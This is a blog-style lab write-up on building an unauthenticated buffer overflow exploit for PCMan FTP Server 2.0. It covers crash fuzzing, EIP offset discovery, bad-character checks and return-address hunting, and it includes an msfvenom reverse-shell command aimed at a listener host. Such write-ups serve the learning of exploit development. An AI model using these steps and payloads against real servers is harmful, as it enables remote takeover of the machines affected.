PCMan FTP Server 2.0 — Remote Buffer Overflow without login

“As a practice for me to test my knowledge of exploitation, I decided to find a vulnerable version of programs that has exploits in exploit-db and find another way to exploit it.”

Assalamu-Alikum, Welcome back again, yes, it’s different now, besides of my experience of Web Pentesting and Malware Analysis, now, I can exploit any BOF vulnerability with bypassing ASLR DEP for Windows Platform.

[This is not a pure article, it’s just for finding other from another exploit]

I’ll not explain What’s BOF vuln and how to exploit it in Windows, which is more difficult and challenging to Linux, you can find it on the Internet for free, but here, I’m going to teach you how to find your own exploit. [resources at the end of the article]

Now, you learned the BOF vuln and need to find your own exploit, How?

for me, I went to exploit-db website, searched for “Overflow” and found the vuln program which called “PCMan FTP Server version 2.0”, Waqas Ahmed Faroouqi has found a remote BOF vuln at “pwd” command.

Figure(1): The least exploits for BOF till 8/8/2024

And if we see it, we found that the exploit is very simple and must be logged in to succeed exploiting the vuln, so, let’s try to find the exploit without login :))))))), can we?

figure(2): source: PCMan FTP Server 2.0 — ‘pwd’ Remote Buffer Overflow — Windows remote Exploit (exploit-db.com)

Let’s test all things in our own lab, download the vuln software, setup it in your own Windows vm, open your own other Linux vm [ or any testing lab you want]

figure(3): my own lab for testing BOF vulnerability

First, Understand the behavior of the program without testing:

figure(4): it has anonymous login

Ok, let’s build our script to connect to the server:

import socket
host="192.168.56.102" #the vulerable remote host

buf = b"test"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,21))
s.send(buf)
print(s.recv(1024))
s.close()

figure(5): the output of the script

Ok, now, let’s test and make some noisy:

but, First, attach the FTP server to your debugger:

figure(6): attaching the ftp server to immunity debugger

Wow, it just a random :)))))

We successfully crashing the software, I just made the number 5000 randomly :))))

figure(7): crashing the software

figure(8): EIP and the Stack have our buffer

Ok, we found our first exploit: PCMan FTP Server 2.0 — Danial Of Service without login.

let’s reproduce it to make a successfully buffer overflow vulnerability.

Finding the location of the EIP, then find JMP ESP, then make your reverse shellcode, but we forgot something.

$/usr/share/metasploit-framework/tools/exploit/pattern_create -l 5000

After sending the pattern to the server, we find the EIP has that:

figure(9): Finding the location of the EIP

W found the EIP in 2007 location which the same to the exploit in the exploit-db website:

figure(10): we found the same vuln wihtout login

so, If we copy -paste that code and change the size the return address, it should be work in our case, but let me make it by myself.

Let’s sure we control the EIP:

figure(11): Controlling the EIP

Let’s find the badchars:

figure(12): \x0a is the second bad char

The second bad char we found is “\x0a”, as you can see in the figure, it seems to be \x00 not \x0a, let’s remove it and send again.

figure(13): \x0d is the third bad char

The third bad char is “\x0d” as expected, “\x00, \x0a, \x0d” is the bad chars for the web servers and sometimes for ftp servers.

After removing the bad chars and send the exploit again, we didn’t see any bad char again:

figure(14): no bad chars again

Which the same result here:

we are in the right route

figure(15): the same result for the same vulnerability

Let’s find the JMP ESP be mona, but first, we need to know the modules:

figure(16): Modules of PCMan FTP Server

we have 2 modules that can bypass ASLR, DEP protections and the program executable itself.

but we didn’t find any return to ESP for those:

figure(17): no JMP ESP on Blowfish.dll Lang.dll

Only at the executable server itself, which all the addresses have the “\x00” bad char as expected, that’s why we not prefere to use the executable addresses in our exploit:

figure(18): JMP ESP only in the executable itself

That’s why the researcher using the Windows DLL -USER32.dll- as a module for the return address.

figure(19): the return address used from USER32.dll

That’s a problem guys, in real world, you can’t hack the victim by this solution because Windows DLLs is rebase which mean the address base of their executable is changeable every restarting the machine.

Your exploit is not reliable, we need a solution for it!! Comment now

So, searching for “call ESP” at “USER32.dll” and then put the address of that call as the return address of the EIP, then create the shellcode as usual from Metasploit and start your listener:

 $msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

figure(20): We hit the return address successfully

And we receiving the shell successfully:

figure(21): The final dance

Now, our final exploit is here:

TamatahYT/PCManFTP2.0 (github.com)